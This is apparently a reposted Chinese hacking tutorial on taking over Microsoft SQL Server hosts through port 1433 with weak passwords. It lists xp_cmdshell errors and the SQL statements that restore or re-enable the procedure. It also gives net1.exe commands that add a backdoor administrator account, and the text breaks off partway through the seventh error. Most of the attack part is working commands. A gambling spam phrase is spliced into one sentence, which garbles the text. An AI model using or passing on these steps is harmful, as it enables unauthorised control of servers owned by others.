1433SQL-TOOL执行命令错误修复大全.docVIP

选自：华夏彩客网（） 1433端口是SQL数据库端口，当一台服务器的SQL数据库存在弱口令就很容易被黑客攻击 现在比较流行的1433抓鸡，1433抓服务器就是利用这个原理。 黑客一般先利用端口扫描工具批量扫描ip，找到打开1433端口的主机（一般只有作为服务器使用的主机才会打开1433端口），再利用X-SCAN或者其他工具过滤出存在SQL弱口令的主机来 然后用SQL TOOLS连接主机，进行SQL或者CMD命令执行，从而 得主机的控制权，但是服务器的管理人员通常会把一些不安全的漏洞补上，所以用sql tools直接执行命令成功的几率不大，会出现很多种错误，这时就需要用到sql查询分离器来执行命令 下面我就把一些常见的错误及修复方法列出来： 下面提及的命令都是通过sql查询分离器执行的！ 错误一：Error Message:未能找到存储过程 master..xp_cmdshell。修复方法：第一步先删除：drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc xp_cmdshell服务器: 消息 3701，级别 11，状态 5，行 1 第二步恢复：dbcc addextendedproc (sp_oacreate,odsole70.dll)dbcc addextendedproc (xp_cmdshell,xplog70.dll) 错误二：拒绝访问 修复方法：一般管理会把net.exe禁用或者改名，Net1是和net效果一样的sql tools执行DOS?? dir net1.exe /s /p? （有哪些信誉好的足球投注网站net1.exe的位置） 一般结果显示在?C:\WINDOWS\system32\dllcache 的目录 我们利用这个目录的net1执行cmd命令C:\WINDOWS\system32\dllcache\net1.exe user 123 123 /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators 123 /add 提权成功 ? 错误三：Error Message:SQL Server 阻止了对组件 xp_cmdshell 的 过程 sys.xp_cmdshell 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 xp_cmdshell。有关启用 xp_cmdshell 的详细信息，请参阅 SQL Server 联机丛书中的 外围应用配置器。 修复方法：EXEC sp_configure show advanced options, 1 --RECONFIGURE WITH OVERRIDE --EXEC sp_configure xp_cmdshell, 1 --RECONFIGURE WITH OVERRIDE --EXEC sp_configure?? show advanced options, 0 -- 错误四：无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。） 恢复方法：查询分离器连接后,第一步执行：sp_dropextendedproc xp_cmdshell第二步执行：sp_addextendedproc xp_cmdshell, xpsql70.dll 错误五：无法装载 DLL xpweb70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 修复方法：第一步exec sp_dropextendedproc xp_cmdshell 第二步dbcc addextendedproc (xp_cmdshell,c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll);EXEC sp_configure?? show advanced options, 0 -- 错误六：无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 恢复方法：查询分离器连接后,第一步执行:exec sp_dropextendedproc xp_cmdshell第二步执行:exec sp_addextendedproc xp_cmdshell,xpweb70.dll?? 错误七：xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 前提是cmd.exe 和odsole70.dll存在 然后利用以下SQL语句